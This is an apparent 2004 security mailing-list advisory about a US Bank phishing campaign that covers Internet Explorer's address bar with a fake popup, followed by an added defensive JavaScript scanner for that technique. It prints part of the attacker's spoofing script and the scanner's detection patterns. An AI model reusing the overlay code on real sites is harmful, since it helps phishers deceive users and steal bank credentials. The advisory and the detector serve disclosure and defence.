IE URL Issue Being Used In Phishing In the Wild [USBank] May 13 2004 10:30PM
Drew Copley (dcopley eeye com) (2 replies)
One of our developers (Laurentiu Nicula) received an alarming type
of phishing attack today.

received: from UsBank.com ([])

[ = [ 82-33-97-75.cable.ubr10.azte.blueyonder.co.uk ]

The email looks legitimate enough, but links to:


The webpage attempts to throw up a little url bar of its own
which covers IE's url bar. This allows a pretty convincing spoof
job to happen.

The pop up looks just like IE's url bar, and it is even selectable.

This does not work in Netscape.

It is very similar to Malware's issues of late.

He protected the source pretty well, but it reveals some interesting
code which I googled to some Italian guy here (post made in December
of last year):


Here is the vulnerable code page:

HTTP/1.1 200 OK
Date: Thu, 13 May 2004 22:19:10 GMT
Server: Apache/1.3.29 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2
mod_bwlimited/1.4 PHP/4.3.3 FrontPage/ mod_ssl/2.8.16
Last-Modified: Wed, 12 May 2004 03:47:59 GMT
ETag: "1da80c8-388-40a19e6f"
Accept-Ranges: bytes
Content-Length: 904
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
Content-Type: text/html

var vuln_x, vuln_y, vuln_w, vuln_h;
// Work out where the popup goes, relative to the window's position on screen.
function vuln_calc() {
  var root= document[
    (document.compatMode=='CSS1Compat') ?
    'documentElement' : 'body'
  ];
  vuln_x= window.screenLeft+72;
  vuln_y= window.screenTop-20;
  vuln_w= root.offsetWidth-520;
  vuln_h= 17;
}

var vuln_win;
// Create the popup and fill it with the markup held in vuln_html.
function vuln_pop() {
  vuln_win= window.createPopup();
  vuln_win.document.body.innerHTML= vuln_html;
  vuln_win.document.body.style.margin= 0;
  vuln_win.document.body.onunload= vuln_pop;
}

function vuln_show() {
  if (vuln_win)
    vuln_win.show(vuln_x, vuln_y, vuln_w, vuln_h);
}

var vuln_html= '\x3Cdiv style="height: 100%; line-height: 17px;
font-family: \'Tahoma\', sans-serif; font-size:

Re: IE URL Issue Being Used In Phishing In the Wild [USBank] May 15 2004 05:18AM
Nick FitzGerald (nick virus-l demon co uk)
Re: IE URL Issue Being Used In Phishing In the Wild [USBank] May 14 2004 05:44PM
Todd C. Campbell (todd campbell core com)
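A defensive triage sketch for the overlay technique described in Drew Copley's post above (an added example, not code from the original post or from eEye): it scores page source for the combination of window.createPopup(), a position derived from window.screenTop/screenLeft that lands above the page, and an onunload handler. The indicator names, weights and threshold are assumptions chosen for illustration; the first sample reuses lines from the post's listing and the second is constructed.

```javascript
// Static heuristic: flag page source that combines the traits of the
// address-bar overlay. Weights and THRESHOLD are illustrative assumptions.
const INDICATORS = [
  { id: 'createPopup',    weight: 2, re: /\bcreatePopup\s*\(/ },       // chromeless IE popup
  { id: 'screenOrigin',   weight: 1, re: /\bscreen(?:Left|Top)\b/ },   // reads window position
  { id: 'aboveClient',    weight: 2, re: /\bscreenTop\s*-\s*\d+/ },    // y above the page area
  { id: 'reopenOnUnload', weight: 1, re: /\.onunload\s*=/ },           // handler set on unload
];
const THRESHOLD = 4;

// Undo \xHH, \uHHHH and %HH escapes (the post's listing hides "<" as \x3C)
// so that escaped markup and names are matched in their decoded form.
function normalize(src) {
  const dec = (_, h) => String.fromCharCode(parseInt(h, 16));
  return src
    .replace(/\\x([0-9a-fA-F]{2})/g, dec)
    .replace(/\\u([0-9a-fA-F]{4})/g, dec)
    .replace(/%([0-9a-fA-F]{2})/g, dec);
}

// Returns the matched indicator ids, their summed weight and a verdict.
function scanSource(src) {
  const text = normalize(src);
  const hits = INDICATORS.filter((i) => i.re.test(text));
  const score = hits.reduce((sum, i) => sum + i.weight, 0);
  return { score, hits: hits.map((i) => i.id), suspicious: score >= THRESHOLD };
}

// Lines taken from the listing in the post.
const SAMPLE_OVERLAY = [
  'vuln_y= window.screenTop-20;',
  'vuln_win= window.createPopup();',
  'vuln_win.document.body.onunload= vuln_pop;',
  'vuln_win.show(vuln_x, vuln_y, vuln_w, vuln_h);',
].join('\n');

// Constructed benign page script: reads the window position, opens a normal window.
const SAMPLE_BENIGN = [
  'var topEdge = window.screenTop;',
  'window.open("help.html");',
].join('\n');

console.log(scanSource(SAMPLE_OVERLAY));
console.log(scanSource(SAMPLE_BENIGN));
```

A single indicator on its own is common in legitimate pages, which is why the verdict depends on the combined score.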


